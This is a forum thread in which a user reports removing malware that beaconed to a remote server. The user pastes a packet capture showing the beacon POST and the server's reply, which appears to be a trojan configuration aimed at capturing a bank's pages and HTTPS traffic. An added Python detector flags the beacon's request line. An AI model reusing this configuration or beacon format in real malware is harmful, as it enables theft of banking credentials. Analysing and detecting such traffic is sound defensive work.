My puter was "calling home" to

I have manually removed a malware from my system.
It was opening a lot of ports.
And every time it opened a new port
it was "calling home" to

I can provide a full Ethereal dump
and the 3 "bad" files I found
if anybody is interested.

I have sent an email to the ISP's abuse.

This is what Ethereal extracted:

POST /cgi-bin/ref.cgi?Sun%20Apr%2017%2016%3A58%3A13.593%202005 HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 108
Accept: */*
Accept-Language: en
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Connection: close

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2005 04:00:09 GMT
Server: Apache/2.0.40 (Red Hat Linux)
Content-Length: 671
Connection: close
Content-Type: text/html; charset=ISO-8859-1

http +Ba "Mozilla/4.0 (compatible\; MSIE 6.0\; Windows NT 5.1)"
httpp +
log +everything +Smz 1 9;setwnd 8 * * * +wclCME 60 1;timer
-qewrqrewq;timer +qewrqrewq -R+AIc 10000000 "setwnd 8 * * * -E"
setwnd 0 ** * * +urfKPMWS 4096 2 200000
setwnd 1 *.lloydsts* * * +urfKPMWS 4096 2 200000
setwnd 2 ** * * +urfKPMWS 4096 2 200000
setwnd 3 ** * * +urfKPMWS 4096 2 200000
setwnd 4 ** * * +urfKPMWS 4096 2 200000
setwnd 17 https://* * * +urfKPBMW 4096 1000 2
setwnd 18 * https://* * +urfKPBMW 4096 1000 2
setwnd 19 * * * +urfKP*MW 4096 2
http #hosts +I 60000
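
Added example, not part of the original post or written by its author: a Python check that flags request lines shaped like the one in the capture above, a POST to /cgi-bin/ref.cgi whose whole query string decodes to a timestamp. The function names and every sample line except the first are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Timestamp shape seen in the post's capture: "Sun Apr 17 16:58:13.593 2005"
STAMP = re.compile(
    r"(Mon|Tue|Wed|Thu|Fri|Sat|Sun) "
    r"(Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec) "
    r"\d{1,2} \d{2}:\d{2}:\d{2}\.\d{3} \d{4}"
)
BEACON_PATH = "/cgi-bin/ref.cgi"  # path taken from the capture in the post

def parse_request_line(line):
    """Split 'METHOD target HTTP/x.y' into its three parts, or return None."""
    parts = line.strip().split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return None
    return parts[0], parts[1], parts[2]

def is_beacon(line):
    """True for a POST to BEACON_PATH whose whole query string is a timestamp."""
    parsed = parse_request_line(line)
    if parsed is None:
        return False
    method, target, _version = parsed
    url = urlsplit(target)  # handles origin-form and absolute (proxy) targets
    if method != "POST" or url.path != BEACON_PATH:
        return False
    return STAMP.fullmatch(unquote(url.query)) is not None

def find_beacons(lines):
    """Return the decoded client timestamp of every matching request line."""
    return [unquote(urlsplit(parse_request_line(line)[1]).query)
            for line in lines if is_beacon(line)]

# First line is the request line from the post; the others are constructed.
SAMPLE = [
    "POST /cgi-bin/ref.cgi?Sun%20Apr%2017%2016%3A58%3A13.593%202005 HTTP/1.0",
    "GET /cgi-bin/ref.cgi?Sun%20Apr%2017%2016%3A58%3A13.593%202005 HTTP/1.0",
    "POST /cgi-bin/ref.cgi?id=42 HTTP/1.1",
    "POST /cgi-bin/search.cgi?Mon%20Apr%2018%2009%3A00%3A00.000%202005 HTTP/1.0",
    "garbage line",
]

if __name__ == "__main__":
    for stamp in find_beacons(SAMPLE):
        print("beacon-shaped request, client timestamp:", stamp)
```
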

Re: My puter was "calling home" to

I doubt that by you sending an email anything is going to happen.  The
machine could have been compromised by someone else and is only a launching
pad to attack other machines on the Internet and the user may not be aware
of it.  If your machine was compromised, then a user of that machine
contributed to it in some way by clicking on something that led to the
compromise. It just didn't happen by itself.

Duane :)

Re: My puter was "calling home" to

-rehn- wrote:

A whois on that IP points to Amsterdam. Good luck.

Re: My puter was "calling home" to

Could you please provide me with the Ethereal dump and the files you
found?  Depending on size, the easiest way would be to zip them up with
a password and email them to me - malwaretrojan at yahoo dot co dot uk.

If you would prefer to do it another way please let me know.



